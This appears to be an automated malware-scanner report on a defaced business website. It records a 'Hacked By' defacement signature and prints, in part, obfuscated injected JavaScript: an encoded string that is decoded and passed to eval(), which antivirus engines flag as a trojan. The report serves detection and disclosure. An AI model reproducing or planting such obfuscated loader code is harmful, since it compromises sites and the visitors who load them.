New scan:

Malware Scanner report for worcestercountybusinesses.com

Malicious/Suspicious/Total urls checked
2/0/2
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸&#1  (175 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.worcestercountybusinesses.com/
200 OK
Content-Length: 37714
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

var _1IO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPBTMfhCZslGaDRmblBHch5SSP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ASSP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLPBTMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTwEzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25
... 3048 bytes are skipped ...
i++));h4=OIOlOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function OIO(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_1OO(OIO(_1IO)));

Antivirus reports:

Rising
JS:Malware.JCrypto!1.9BF9
Comodo
TrojWare.JS.Agent.JM

Deface/Content modification. The following signature was found: &#1203;&#824;&#1202;&#824;&#1203; Hacked By Antonio hacker Sakit Hati &#1203;&#824;&#1202;&#824;&#1

<title> &#1203;&#824;&#1202;&#824;&#1203; Hacked By Antonio hacker Sakit Hati &#1203;&#824;&#1202;&#824;&#1203; </title>
<!-- &#1203;&#824;&#1202;&#824;&#1203; Hacked By Antonio hacker Sakit Hati &#1203;&#824;&#1202;&#824;&#1203; --><script language="javascript" type="text/javascript">var _1IO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPBTMfhCZslGaDRmblBHch5
...[37424 bytes skipped]...


http://www.worcestercountybusinesses.com/test404page.js
404 Not Found
Content-Length: 37714
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _1IO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPBTMfhCZslGaDRmblBHch5SSP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ASSP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLPBTMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTwEzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25
... 3048 bytes are skipped ...
i++));h4=OIOlOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function OIO(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_1OO(OIO(_1IO)));

Antivirus reports:

Rising
JS:Malware.JCrypto!1.9BF9
Comodo
TrojWare.JS.Agent.JM


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: worcestercountybusinesses.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: worcestercountybusinesses.com
Referer: http://www.google.com/search?q=worcestercountybusinesses.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=worcestercountybusinesses.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://worcestercountybusinesses.com/

Result: worcestercountybusinesses.com is not infected or malware details are not published yet.